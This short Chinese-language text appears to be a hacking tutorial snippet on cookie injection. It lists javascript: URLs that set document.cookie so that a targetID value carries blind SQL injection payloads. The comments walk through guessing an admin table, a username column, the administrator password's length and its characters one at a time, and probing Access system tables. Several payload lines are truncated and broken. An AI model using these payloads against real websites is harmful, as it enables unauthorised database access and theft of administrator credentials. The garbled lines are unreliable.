前提是服务器读取cookies验证(有加密和数字签名的cookies很难修改了)
一。通过盗取 和修改cookies文件
二。通过命令行document.cookie
javascript:alert(document.cookie="));
javascript:alert(document.cookie="));
//猜是否有admin表
javascript:alert(document.cookie="));
//猜是否有username表
javascript:alert(document.cookie="));
//看管理员密码是否是5位
javascript:alert(document.cookie="));
//第一位是否是ASC码97,相当于a
javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
javascript:alert(document.cookie="));
//第二位
javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
//看系统表